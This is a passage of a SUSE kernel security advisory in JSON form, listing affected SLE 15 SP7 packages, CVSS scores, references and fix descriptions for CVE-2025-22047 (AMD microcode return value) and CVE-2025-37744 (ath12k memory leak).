"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2024-56721"
},
{
"cve": "CVE-2025-22047",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22047"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/microcode/AMD: Fix __apply_microcode_amd()\u0027s return value\n\nWhen verify_sha256_digest() fails, __apply_microcode_amd() should propagate\nthe failure by returning false (and not -1 which is promoted to true).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22047",
"url": "https://www.suse.com/security/cve/CVE-2025-22047"
},
{
"category": "external",
"summary": "SUSE Bug 1241437 for CVE-2025-22047",
"url": "https://bugzilla.suse.com/1241437"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-22047"
},
{
"cve": "CVE-2025-37744",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37744"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix memory leak in ath12k_pci_remove()\n\nKmemleak reported this error:\n\n unreferenced object 0xffff1c165cec3060 (size 32):\n comm \"insmod\", pid 560, jiffies 4296964570 (age 235.596s)\n backtrace:\n [\u003c000000005434db68\u003e] __kmem_cache_alloc_node+0x1f4/0x2c0\n [\u003c000000001203b155\u003e] kmalloc_trace+0x40/0x88\n [\u003c0000000028adc9c8\u003e] _request_firmware+0xb8/0x608\n [\u003c00000000cad1aef7\u003e] firmware_request_nowarn+0x50/0x80\n [\u003c000000005011a682\u003e] local_pci_probe+0x48/0xd0\n [\u003c00000000077cd295\u003e] pci_device_probe+0xb4/0x200\n [\u003c0000000087184c94\u003e] really_probe+0x150/0x2c0\n\nThe firmware memory was allocated in ath12k_pci_probe(), but not\nfreed in ath12k_pci_remove() in case ATH12K_FLAG_QMI_FAIL bit is\nset. So call ath12k_fw_unmap() to free the memory.\n\nTested-on: WCN7850 hw2.0 PCI WLAN.HMT.2.0-02280-QCAHMTSWPL_V1.0_V2.0_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
